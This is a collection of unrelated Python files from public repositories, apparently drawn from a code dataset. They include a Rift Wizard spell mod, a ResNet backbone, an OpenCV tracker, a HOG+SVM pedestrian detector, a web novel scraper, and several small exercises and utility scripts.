can charge for\n\n\n\tdef on_cast(self, x, y, turns_charged):\n\t\ttarget = Point(x, y)\n\n\t\tfor stage in Burst(self.caster.level, target, self.get_stat('radius') + turns_charged):\n\t\t\tfor point in stage:\n\t\t\t\tdamage = self.get_stat('damage') + 3*turns_charged\n\t\t\t\t\n\t\t\t\tself.caster.level.deal_damage(point.x, point.y, damage, Tags.Fire, self)\n\t\t\tyield\n\n\tdef get_description(self):\n\t\ttry:\n\t\t\treturn (\"Charge up and cast a fireball.\\n\"\n\t\t\t\t\t\"Each turn spent charging increases the radius by 1.\\n\"\n\t\t\t\t\t\"The fireball deals [{damage}_fire:fire] damage and has a base radius of {radius}.\\n\"\n\t\t\t\t\t\"The fireball can be charged for up to {max_charge} turns.\\n\"\n\t\t\t\t\t\"Channel the spell to charge it, and recast it before the charge limit is reached to cast the fireball.\").format(**self.fmt_dict())\n\t\texcept:\n\t\t\t\treturn 'error'\n\nSpells.all_player_spell_constructors.append(PowerupFireball)\n\n# credit to Anti-Tank Guided Missile#0888 for this idea\nclass ThunderingHail(API_ChargedSpells.DualEffectSpell):\n\tdef on_init(self):\n\t\tsuper(ThunderingHail, self).on_init()\n\t\tself.name = \"Thundering Hail\"\n\n\t\tself.can_target_self = False\n\t\tself.level = 1 # self.level = 3\n\t\tself.tags = [Tags.Lightning, Tags.Ice, Tags.Sorcery]\n\t\tself.range = 15\n\t\t\n\t\tself.radius = 4\n\t\tself.effect_1_radius_increase_per_turn = 1\n\t\tself.effect_1_base_damage = 2\n\t\tself.effect_1_damage_increase_per_turn = 1\n\n\t\tself.effect_2_base_radius = 4\n\t\tself.effect_2_radius_increase_per_turn = 1\n\t\tself.effect_2_base_damage = 11\n\t\tself.effect_2_damage_increase_per_turn = 1\n\n\t\tself.max_charges = 4\n\t\tself.max_charge = 3 # this is how many turns the spell can charge for\n\n\n\tdef get_impacted_tiles(self, x, y):\n\t\tradius = self.get_stat('radius')\n\t\treturn [p for stage in Burst(self.caster.level, Point(x, y), radius) for p in stage]\n\n\n\tdef on_cast1(self, x, y, turns_charged, turns_remaining):\n\t\ttarget = Point(x, y)\n\n\t\tfor stage in Burst(self.caster.level, target, self.get_stat('radius') + self.get_stat('effect_1_radius_increase_per_turn')*turns_charged):\n\t\t\tfor point in stage:\n\t\t\t\tdamage = self.get_stat('effect_1_base_damage') + self.get_stat('effect_1_damage_increase_per_turn')*turns_charged\n\t\t\t\t\n\t\t\t\tself.caster.level.deal_damage(point.x, point.y, damage, Tags.Ice, self)\n\t\t\t\tself.caster.level.deal_damage(point.x, point.y, damage, Tags.Physical, self)\n\t\t\t\t\n\t\t\tyield \n \n\t\treturn\n\n\t\n\tdef on_cast2(self, x, y, turns_charged):\n\t\ttarget = Point(x, y)\n\t\t\n\t\tfor stage in Burst(self.caster.level, target, self.get_stat('effect_2_base_radius') + self.get_stat('effect_2_radius_increase_per_turn')*turns_charged):\n\t\t\tfor point in stage:\n\t\t\t\tdamage = self.get_stat('effect_2_base_damage') + self.get_stat('effect_2_damage_increase_per_turn')*turns_charged\n\t\t\t\t\n\t\t\t\tself.caster.level.deal_damage(point.x, point.y, damage, Tags.Lightning, self)\n\t\t\t\t\n\t\t\tyield \n \n\t\treturn\n\n\tdef get_description(self):\n\t\ttry:\n\t\t\treturn (\"Cast a chargeable gravity well that reverses direction at the end of charging.\\n\"\n\t\t\t\t\t\"Each turn spent charging increases the radius and damage of the final effect by 1.\\n\"\n\t\t\t\t\t\"The final effect deals 11 Arcane and 11 Physical damage.\\n\"\n\t\t\t\t\t\"Each turn spent charging, units are pulled towards the center.\\n\"\n\t\t\t\t\t\"Channel the spell to charge it, and recast it before the charge limit is reached to cast the final effect.\").format(**self.fmt_dict())\n\t\texcept:\n\t\t\treturn 'error'\n\n\nSpells.all_player_spell_constructors.append(ThunderingHail)\n\n","repo_name":"FreezeDriedMangos/clays-riftwizard-mods","sub_path":"Singleplayer/BasicChargedSpells/BasicChargedSpells.py","file_name":"BasicChargedSpells.py","file_ext":"py","file_size_in_byte":7018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33399734872","text":"import torch\r\nimport random\r\nimport argparse\r\nfrom experiment import run_experiment\r\n\r\nmanualSeed = 0\r\nprint(\"Random Seed: \", manualSeed)\r\nrandom.seed(manualSeed)\r\ntorch.manual_seed(manualSeed)\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('--dataset', type = str, default=\"compas\", help=\"dataset to run(compas, framingham, adult, german)\")\r\nparser.add_argument('--eval_metric', type = str, default=\"xauc\", help=\"metric of ranking fairness, xauc or prf\")\r\nparser.add_argument('--classifier', type = str, default=\"lr\", help=\"classificaion model. lr for logistic regression, rb for rankboost\")\r\n\r\nif __name__ == \"__main__\":\r\n args = parser.parse_args()\r\n dataset, eval_metric, classifier = args.dataset, args.eval_metric, args.classifier\r\n print(\"Run experiment for classifier {}, metric {} on {} dataset\".format(classifier,eval_metric,dataset))\r\n run_experiment(dataset, eval_metric, classifier)\r\n\r\n","repo_name":"cuis15/xorder","sub_path":"run_experiment.py","file_name":"run_experiment.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"27183793169","text":"class Solution(object):\n def findWinners(self, matches):\n \"\"\"\n :type matches: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n win = []\n los = []\n\n for m in matches:\n win.append(m[0])\n los.append(m[1])\n\n first = []\n second = [] \n count = Counter(los)\n for i in range(len(win)):\n if (count[win[i]] == 0):\n first.append(win[i])\n if (count[win[i]] == 1):\n second.append(win[i])\n if (count[los[i]] == 1):\n second.append(los[i])\n \n \n first = list(set(first))\n second = list(set(second))\n first.sort()\n second.sort()\n return [first, second]","repo_name":"Rouxxs/One-Leetcode-a-day-keeps-bug-away","sub_path":"Day 1 - 10/Day 1 - 2225. Find Players With Zero or One Losses.py","file_name":"Day 1 - 2225. Find Players With Zero or One Losses.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17327721936","text":"# Tuples are a collection of Python objects much like a list but Tuples are immutable in nature i.e. \n# the elements in the tuple cannot be added or removed once created.\n# Tuples are more memory efficient than the lists. When it comes to the time efficiency, \n# tuples have a slight advantage over the lists especially when we consider lookup value. \n# If you have data that shouldn't change, you should choose tuple data type over lists.\n\nmy_tuple = (2, 8, 1, 6, 10)\nprint(my_tuple)\n\n# Converting a list into a tuple\nlist = [\"Hi\", \"my\", \"name\", \"is\", \"Carson\"]\nlist = tuple(list)\nprint(list)","repo_name":"carsonshevlin/Data-Structures","sub_path":"tuples.py","file_name":"tuples.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71179387962","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom urllib.request import urlopen \nfrom bs4 import BeautifulSoup \nimport urllib.request\nimport re\n\n \ndef write_file(file_name, s_article):\n with open(file_name, 'a',encoding='utf8') as f:\n f.write(s_article) \n \n\ndef read_article_XiaoShuo_chapter(article_title,article_url):#从章节里读取内容,写入小说文件里\n headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) ' 'Chrome/51.0.2704.63 Safari/537.36'}\n req = urllib.request.Request(url=article_url, headers=headers)\n html = urllib.request.urlopen(req).read()#.decode('utf8')#, 'ignore' \n bsObj = BeautifulSoup(html, \"lxml\") \n chapter_title=bsObj.find('div',attrs={'class':'bookname'}).h1.get_text()\n print(chapter_title)\n write_file(article_title, '\\n'+chapter_title+'\\n')\n a_list=bsObj.findAll('div',attrs={'id':'content'}) \n for a in a_list:\n s=a.get_text()\n s1=re.sub(u'(\\xa0)+', '\\n',s)\n s2=re.sub('(.*--?)|(--.*--?)|(--.*)','',s1,flags=re.DOTALL)\n s2=re.sub('[a-zA-Z]+?','',s2,flags=re.DOTALL)\n write_file(article_title, s2+'\\n')\n\ndef read_article_title(article_url):\n headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) ' 'Chrome/51.0.2704.63 Safari/537.36'}\n req = urllib.request.Request(url=article_url, headers=headers)\n html = urllib.request.urlopen(req).read().decode('gbk')#, 'ignore' \n bsObj = BeautifulSoup(html, \"lxml\") \n \n article_title=bsObj.div.h1.get_text()+'.txt' #获得小说名字\n for ch in bsObj.find('div',attrs={'id':'list'}).findAll('a',attrs={'href':True}):#获取小说链接\n chapter_name=ch.get_text()#章节名称\n chapter_href=ch.get('href')#章节链接\n# print(ch.get_text(),' ',chapter_href)\n read_article_XiaoShuo_chapter(article_title,chapter_href)\nread_article_title('http://www.ranwen.net/files/article/81/81269/')\n","repo_name":"Jay1998/FetchNovel","sub_path":"src/从燃文下载小说.py","file_name":"从燃文下载小说.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36491518721","text":"from clase import Clase\nimport csv\n\ndef carga_archivo(nameFile):\n lista = []\n file = open(nameFile)\n csvreader = csv.reader(file)\n for row in csvreader:\n id = row[0]\n name = row[1]\n born = row[2]\n newclase = Clase(id, name, born)\n lista.append(newclase)\n return(lista)\n\ndef fun_reverse(lista):\n lista.reverse()\n print(lista)\n\n\ndef main():\n lista = carga_archivo('dataset.csv')\n fun_reverse(lista)\n\n\nif __name__ == '__main__':\n main()","repo_name":"Sphinx0102/poo-ejercicios","sub_path":"unidad-2/Trabajo de investigacion/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"558791865","text":"# -*- coding: utf-8 -*-\n\nimport math\nimport torch\nimport torch.nn as nn\nfrom torch.utils import model_zoo\nfrom models.sync_batchnorm.batchnorm import SynchronizedBatchNorm2d\n\n\nmodel_urls = {\n 'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',\n 'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',\n}\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None, dilation=1, BatchNorm=None):\n super(BasicBlock, self).__init__()\n # self.conv1 = conv3x3(inplanes, planes, stride=stride, dilation=dilation)\n self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=3, stride=stride,\n padding=dilation, dilation=dilation, bias=False)\n self.bn1 = BatchNorm(planes)\n self.relu = nn.ReLU(inplace=True)\n # self.conv2 = conv3x3(planes, planes, stride=1, dilation=dilation)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1,\n padding=dilation, dilation=dilation, bias=False)\n self.bn2 = BatchNorm(planes)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n\n return out\n\n\nclass ResNet(nn.Module):\n def __init__(self, backbone, block, layers, BatchNorm, in_channels=3, \n pretrained=True):\n self.backbone = backbone\n \n self.inplanes = 64\n super(ResNet, self).__init__()\n self.conv1 = nn.Conv2d(in_channels, 64, kernel_size=7, stride=2, padding=3,\n bias=False)\n self.bn1 = BatchNorm(64)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n self.layer1 = self._make_layer(block, 64, layers[0], BatchNorm=BatchNorm)\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2, BatchNorm=BatchNorm)\n self.layer3 = self._make_layer(block, 256, layers[2], stride=1, dilation=2, BatchNorm=BatchNorm)\n self.layer4 = self._make_layer(block, 512, layers[3], stride=1, dilation=4, BatchNorm=BatchNorm)\n \n self._init_weight()\n\n if pretrained:\n self._load_pretrained_model()\n\n def _make_layer(self, block, planes, blocks, stride=1, dilation=1, BatchNorm=None):\n downsample = None\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n nn.Conv2d(self.inplanes, planes * block.expansion,\n kernel_size=1, stride=stride, bias=False),\n BatchNorm(planes * block.expansion),\n )\n\n layers = [block(self.inplanes, planes, stride, downsample, BatchNorm=BatchNorm)]\n self.inplanes = planes * block.expansion\n for i in range(1, blocks):\n layers.append(block(self.inplanes, planes, dilation=dilation, BatchNorm=BatchNorm))\n\n return nn.Sequential(*layers)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n\n x = self.layer1(x)\n low_level_feat = x\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n\n return x, low_level_feat\n \n def _init_weight(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n elif isinstance(m, SynchronizedBatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n \n def _load_pretrained_model(self):\n if self.backbone == 'resnet34':\n pretrain_dict = model_zoo.load_url(model_urls['resnet34'])\n elif self.backbone == 'resnet18':\n pretrain_dict = model_zoo.load_url(model_urls['resnet18'])\n else:\n NotImplementedError\n \n model_dict = {}\n state_dict = self.state_dict()\n for k, v in pretrain_dict.items():\n if k in state_dict:\n model_dict[k] = v\n state_dict.update(model_dict)\n self.load_state_dict(state_dict)\n\n\ndef resnet18(in_channels, BatchNorm, pretrained=True):\n if in_channels!=3 and pretrained:\n raise ValueError(\"pretraining is allowed only if input channels is 3\")\n model = ResNet('resnet18', BasicBlock, [2, 2, 2, 2], BatchNorm, \n in_channels=in_channels, pretrained=pretrained)\n return model\n\n\ndef resnet34(in_channels, BatchNorm, pretrained=True):\n if in_channels!=3 and pretrained:\n raise ValueError(\"pretraining is allowed only if input channels is 3\")\n model = ResNet('resnet34', BasicBlock, [3, 4, 6, 3], BatchNorm, \n in_channels=in_channels, pretrained=pretrained)\n return model\n\n'''\nimport time\nstart = time.time()\nif __name__ == \"__main__\":\n model = resnet18(in_channels=3, BatchNorm=nn.BatchNorm2d, pretrained=True)\n input = torch.rand(1, 3, 256, 256)\n output, low_level_feat = model(input)\n print(output.size())\n print(low_level_feat.size())\nend = time.time()\nprint(end-start)\n'''\n\n","repo_name":"renzhenwang/pairwise_segmentation","sub_path":"models/backbone/shallow_resnet.py","file_name":"shallow_resnet.py","file_ext":"py","file_size_in_byte":5615,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"40"} +{"seq_id":"4295070120","text":"import cv2\nimport sys\nfrom random import randint\n\n\n# In tracking, our goal is to find an object in the current frame given we have tracked the object successfully in all ( or nearly all ) previous frames\n# https://www.learnopencv.com/object-tracking-using-opencv-cpp-python/\n\nif __name__ == \"__main__\":\n\n vid = cv2.VideoCapture(\"../dataset/test.mp4\")\n if not vid.isOpened():\n raise IOError(\"Couldn't open webcam or video\")\n\n # Multi tracker init\n trackers = cv2.MultiTracker_create()\n\n while True:\n return_value, frame = vid.read()\n\n if not return_value:\n break\n\n rects = []\n \n # get updated location of objects in subsequent frames\n success, boxes = trackers.update(frame)\n for box in boxes:\n (x, y, w, h) = [int(v) for v in box]\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\n \n cv2.imshow(\"Frame\", frame)\n key = cv2.waitKey(1) & 0xFF\n\n # if the 'p' key is selected, we select a bounding box to track\n if key == ord(\"p\"):\n # select the bounding box of the object we want to track (make\n # sure you press ENTER or SPACE after selecting the ROI)\n box = cv2.selectROI(\"Frame\", frame, fromCenter=False,\n showCrosshair=True)\n \n # create a new object tracker for the bounding box and add it\n # to our multi-object tracker\n tracker = cv2.TrackerCSRT_create()\n trackers.add(tracker, frame, box)\n # if the `q` key was pressed, break from the loop\n elif key == ord(\"q\"):\n break\n\n vid.release()\n cv2.destroyAllWindows()","repo_name":"palarax/capstone","sub_path":"tests/tracker.py","file_name":"tracker.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42574550157","text":"from skimage.io import imread\nfrom skimage.transform import resize\nimport cv2 as cv\nfrom sklearn.svm import LinearSVC, SVC\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom detector.config import *\nimport os\nfrom itertools import product\nfrom detector.extract_feature import extract_hog\n\n# 从config读取hog模型参数\nparams_hog = {'orientations': orientations,\n 'pixels_per_cell': pixels_per_cell,\n 'cells_per_block': cells_per_block,\n 'visualize': visualize,\n 'transform_sqrt': transform_sqrt}\n\n# 提前构建后续使用的变量,清除Pycharm报错\ntrain_pos_num = 1\ntrain_neg_num = 1\ntest_pos_num = 1\ntest_neg_num = 1\ntrain_pos_data = None\ntrain_neg_data = None\ntest_pos_data = None\ntest_neg_data = None\ntrain_pos_hog = None\ntrain_neg_hog = None\ntest_pos_hog = None\ntest_neg_hog = None\n\n# 读取所有图片数据,并保存\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nfor mode, category in product(('train', 'test'), ('pos', 'neg')):\n # 此变量为图片父目录,例:train_pos_path\n locals()[mode + '_' + category + '_path'] = BASE_DIR + r'\\data\\INRIAPerson\\INRIAPerson\\\\'[:-1] + mode \\\n + r'_64x128_H96\\\\'[:-1] + category\n # 此变量为图片名称,例:train_pos_paths\n locals()[mode + '_' + category + '_paths'] = os.listdir(locals()[mode + '_' + category + '_path'])\n # 此变量为图片数量,例:train_pos_num\n locals()[mode + '_' + category + '_num'] = len(locals()[mode + '_' + category + '_paths'])\n print(category + '类的' + mode + '数据集有' + str(locals()[mode + '_' + category + '_num']) + '个样本')\n # 读取图片的灰度图,转换为128*64大小,并保存在numpy数组中\n # 此变量为图片数组,例:train_pos_data\n locals()[mode + '_' + category + '_data'] = np.empty((locals()[mode + '_' + category + '_num'], 128, 64))\n for i, path in enumerate(locals()[mode + '_' + category + '_paths']):\n img = imread(locals()[mode + '_' + category + '_path'] + r'\\\\'[:-1] + path, as_gray=True)\n if img.shape[0] > img.shape[1]:\n img = resize(img, (128, 64))\n else:\n img = resize(img, (int(img.shape[0]*64/img.shape[1]), 64))\n top = int((128 - img.shape[0])/2)\n bottom = 128 - top - img.shape[0]\n img = cv.copyMakeBorder(img, top, bottom, 0, 0, cv.BORDER_CONSTANT, value=(255, 255, 255))\n locals()[mode + '_' + category + '_data'][i] = img\n\n# 保存数据\ndata = {\n 'train_pos_data': train_pos_data,\n 'train_neg_data': train_neg_data,\n 'test_pos_data': test_pos_data,\n 'test_neg_data': test_neg_data,\n 'train_pos_target': np.ones(train_pos_num),\n 'train_neg_target': np.zeros(train_neg_num),\n 'test_pos_target': np.ones(test_pos_num),\n 'test_neg_target': np.zeros(test_neg_num)\n}\n\n# 提取图片的hog特征,保存到数组中\nfor mode, category in product(('train', 'test'), ('pos', 'neg')):\n example_hog, _ = extract_hog(locals()[mode + '_' + category + '_data'][0], params_hog['orientations'],\n params_hog['pixels_per_cell'], params_hog['cells_per_block'],\n params_hog['visualize'], params_hog['transform_sqrt'])\n locals()[mode + '_' + category + '_hog'] = np.empty((locals()[mode + '_' + category + '_data'].shape[0],\n len(example_hog)))\n for i in range(locals()[mode + '_' + category + '_data'].shape[0]):\n hog_feature = extract_hog(locals()[mode + '_' + category + '_data'][i], params_hog)\n locals()[mode + '_' + category + '_hog'][i] = hog_feature\ndata['train_pos_hog'] = train_pos_hog\ndata['train_neg_hog'] = train_neg_hog\ndata['test_pos_hog'] = test_pos_hog\ndata['test_neg_hog'] = test_neg_hog\n\n# 训练SVM模型\n# 1.设置训练数据\ntrain_hog = np.vstack((data['train_pos_data'], data['train_neg_data'])).reshape((-1, 128*64))\ntrain_target = np.vstack((data['train_pos_target'], data['train_neg_target']))\n\n# 2.1径向基支持向量机\nsvc_1 = SVC(C=0.01, kernel='rbf', class_weight={0:1, 1:10})\nsvc_1.fit(train_hog, train_target)\n\n# #2.2线性核支持向量机(损失函数为Hinge)\nsvc_2 = LinearSVC(C=1, class_weight={0:1, 1:10})\nsvc_2.fit(train_hog, train_target)\n\n# 3.测试的结果显示,线性核的结果已经足够好了\ntest_hog = np.vstack((data['test_pos_hog'], data['test_neg_hog'])).reshape((test_pos_num + test_neg_num, -1))\npred_target = svc_2.predict(test_hog)\ntest_target = np.hstack((data['test_pos_target'], data['test_neg_target']))\nprint(np.mean(test_target == pred_target))\nprint(pred_target)\n\n# 下一步行动\n# 1.目标检测","repo_name":"moyidou/human_detector","sub_path":"detector/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36509019950","text":"import pandas as pd\n#from dataCapture import findUserIndex\nimport dataCapture as dc\n\ndef matchUsers(df, username):\n destination = df.iloc[dc.findUserIndex(df, username)][\"Destination\"][0]\n matchedUsers = []\n\n for i in range(len(df.index)):\n if df.iloc[i][\"User Name\"] != username and df.iloc[i][\"Destination\"][0] == destination:\n tempdf = df.iloc[i]\n matchedUsers.append({'Username' : tempdf[\"User Name\"],\n 'Email' : tempdf[\"Email\"], \n 'Origin' : tempdf[\"Origin\"],\n 'Destination' : tempdf[\"Destination\"]})\n\n#email, destination, origin, username\n return matchedUsers\n\n#testFrame = dc.readUserData(\"userData.pkl\")\n\n#dc.addUserInfo(testFrame, \"killian\", \"killian@gmail.com\", \"Password\", \"Your moms house\")\n\n#dc.modifySeats(testFrame, \"killian\", 3)\n#dc.modifyDestination(testFrame, \"killian\", \"Your dads house\")\n#dc.modifyPassengers(testFrame, \"killian\", [\"evan\", \"tyler\"])\n#dc.modifyDestination(testFrame, \"admin\", \"Your dads house\")\n\n#users = matchUsers(testFrame, \"admin\")\n\n#print(users)","repo_name":"mattcspeights/Howdy-Hack-2022","sub_path":"flaskr/matchUsers.py","file_name":"matchUsers.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18914969891","text":"import pygame\nfrom scripts.constants import *\nfrom scripts.assets import *\n\n# Vytvoreni bloku\n\n\nclass Block:\n def __init__(self, x, y, width, height, image, floor, action=''):\n self.x = x\n self.y = y\n self.width = 64\n self.height = 64\n self.image = image\n self.image = pygame.transform.scale(\n self.image, (width, height))\n self.rect = self.image.get_rect(topleft=(self.x, self.y))\n self.floor = floor\n self.action = action\n\n def draw(self):\n # Vytvoření posunu všech bloků\n off_set = NUMBER_OF_BLOCKS * \\\n (NUMBER_OF_BLOCKS / 2 / NUMBER_OF_BLOCKS) * \\\n self.width - self.width / 2\n\n # Upravování pozice na základě obdržené pozice (x, y)\n self.rect.x = (self.x * 1 + self.y * -1) * self.width / 2 + off_set\n self.rect.y = (self.x * 0.5 + self.y * 0.5) * self.height / 2\n\n # Zobrazení bloku\n SCREEN.blit(self.image, self.rect)\n self.collide_point = pygame.Rect(\n self.rect.centerx - 5, self.rect.centery - 10, 15, 1)\n\n # Bod kolize\n if HITBOX:\n pygame.draw.rect(SCREEN, RED, self.collide_point)\n\n # pygame.draw.polygon(SCREEN, (255, 255, 255), [\n # (self.rect.x + 32, self.rect.y + 8), (self.rect.x + 64, self.rect.y + 24), (self.rect.x + 32, self.rect.y + 40), (self.rect.x, self.rect.y + 24)])\n\n\nclass IsoMap:\n def __init__(self, map):\n self.map = map\n self.blocks = []\n\n def create_map(self):\n # Vytvoření herní mapy\n for floor in range(len(self.map)):\n for i in range(len(self.map[floor])):\n for j in range(len(self.map[floor])):\n if self.map[floor][i][j] == 0:\n continue\n elif self.map[floor][i][j] == 1:\n self.blocks.append(\n Block(i - floor * 0.5, j - floor * 0.5, PIXELS, PIXELS, grass, floor))\n elif self.map[floor][i][j] == 2:\n self.blocks.append(\n Block(i - floor * 0.5, j - floor * 0.5, PIXELS, PIXELS, grass1, floor))\n elif self.map[floor][i][j] == 3:\n self.blocks.append(\n Block(i - floor * 0.5, j - floor * 0.5, PIXELS, PIXELS, grass2, floor))\n elif self.map[floor][i][j] == 4:\n self.blocks.append(\n Block(i - floor * 0.5, j - floor * 0.5, PIXELS, PIXELS, stone, floor))\n elif self.map[floor][i][j] == 5:\n self.blocks.append(\n Block(i - floor * 0.5, j - floor * 0.5, PIXELS, PIXELS, stone1, floor))\n elif self.map[floor][i][j] == 6:\n self.blocks.append(\n Block(i - floor * 0.5, j - floor * 0.5, PIXELS, PIXELS, water, floor))\n elif self.map[floor][i][j] == 7:\n self.blocks.append(\n Block(i - floor * 0.5, j - floor * 0.5, PIXELS, PIXELS, bush, floor, 'plant'))\n elif self.map[floor][i][j] == 8:\n self.blocks.append(\n Block(i - floor * 0.5, j - floor * 0.5, PIXELS, PIXELS, flower, floor, 'plant'))\n elif self.map[floor][i][j] == 9:\n self.blocks.append(\n Block(i - floor * 0.5, j - floor * 0.5, 180, 140, shop, floor, 'shop'))\n\n def draw(self, player, enemies, shop_menu):\n # Vykreslení vrstvy bloků za hráčem\n for layer1 in self.blocks:\n layer1.draw()\n # Kolize hráče s bloky\n if layer1.action != 'plant':\n player.collision(layer1)\n\n # Kolize nepřítele s bloky\n for enemy in enemies:\n enemy.collision(layer1)\n\n # Vykreslení hráče\n player.draw()\n\n # Vykreslení a určení druhé vrstvy bluků před hráčem\n for layer2 in self.blocks:\n # Když je blok o patro výše než hráč a jeho pozice y je vyšší, tak se vykreslí blok\n if layer2.floor > player.last_collistion and player.rect.bottom < layer2.rect.bottom - 16 or layer2.floor > player.last_collistion + 1:\n layer2.draw()\n\n # Kolize s obchodem a nasledný vstup do obchodu\n if layer2.action == 'shop' and player.rect.colliderect(layer2.collide_point) and layer2.floor == player.last_collistion + 1:\n shop_menu.pause = True\n shop_menu.update()\n\n # Vykreslení nepřítele a kolize s hráčem\n for enemy in enemies:\n enemy.draw()\n enemy.move(player)\n enemy.animation(enemies)\n player.collision_enemy(enemy)\n\n # pygame.draw.polygon(SCREEN, (255, 0, 0), [\n # (WIDTH/2, - PIXELS + 8), (WIDTH + PIXELS, HEIGHT/2), (WIDTH/2, HEIGHT + PIXELS / 2), (-2 * PIXELS + PIXELS, HEIGHT/2)], 2)\n","repo_name":"adammaly004/Isometrics_game","sub_path":"scripts/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":5133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4972075961","text":"#!/usr/bin/env python\n\nimport argparse\nfrom os.path import expanduser\nfrom pathlib import Path\n\nimport guessit\n\nfrom lib import load_config, imdbapi\nfrom lib.helper_index import search_moviedir\n\n\"\"\"\nThis script annotates all movie dirs with .imdb files\nin this file the id of the movies is stored.\n\"\"\"\n\n\n\ndef add_movie(directory, verbose=False):\n \"\"\" Recognizes a movie\n Returns the imdb id\n \"\"\"\n\n # before trying to analyse the directory name, search for a file containing a imdb id\n imdb_id = search_moviedir(directory)\n if imdb_id is None:\n guess = guessit.guess_movie_info(directory.resolve(), info=['filename'])\n\n # print(guess.nice_string())\n # print(\"Correct (at least year and name)? (Y/n)\")\n # if getch().lower() == 'n':\n # pass\n if verbose:\n print(\"Directory:\", directory)\n print(\"guess:\", guess['title'], guess.get('year', ''))\n\n try:\n imdb_id, _ = imdbapi.search(guess['title'], guess.get('year', ''))\n except TypeError:\n # None not iterable\n pass\n\n # if (len(search) == 0):\n # search = ia.search_movie(guess['title'])\n\n # print(\"Results:\")\n # for item in search:\n # print(item['long imdb canonical title'])\n\n # print(\"Choosing first\")\n # result = ia.get_movie(search[0].movieID)\n # ia.update(result, 'keywords')\n\n if imdb_id:\n fh = (directory / '.imdb').open('w')\n fh.write(imdb_id)\n print(\"Stored\", directory)\n\n else:\n print(\"Error for:\", directory)\n\n\ndef is_annotated(directory):\n return len(list(directory.glob('**/.imdb'))) > 0\n\n\ndef index(verbose=False, force=False):\n config = load_config()\n for movies_dir in config.directories:\n d = Path(expanduser(movies_dir))\n for subd in d.iterdir():\n if not is_annotated(subd) or force:\n add_movie(subd, verbose)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Indexer')\n parser.add_argument('--verbose', '-v', action='store_true',\n help='')\n parser.add_argument('--force', action='store_true',\n help='Force the reparsing of the movie folder')\n # parser.add_argument('directory', nargs='?')\n args = parser.parse_args()\n\n index(verbose=args.verbose, force=args.force)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"koppa/moviedb","sub_path":"moviedb_index.py","file_name":"moviedb_index.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37550141408","text":"# Script for converting .xml files to aligned sentences\r\n\r\nimport xml.etree.ElementTree as ET\r\n\r\ndata_en = ET.parse('data/vojska-en.xml')\r\ndata_sl = ET.parse('data/vojska-sl.xml')\r\n\r\nsentences_en = data_en.findall(\"seg\")\r\nsentences_sl = data_sl.findall(\"seg\")\r\n\r\ntgt_en = \"vojska-en.txt\"\r\ntgt_sl = \"vojska-sl.txt\"\r\n\r\nfor sentence_en in sentences_en:\r\n corr_sl = sentence_en.get('corresp')\r\n new_s_en = ''\r\n new_s_sl = ''\r\n for word in sentence_en:\r\n new_s_en += word.text + ' '\r\n for word in 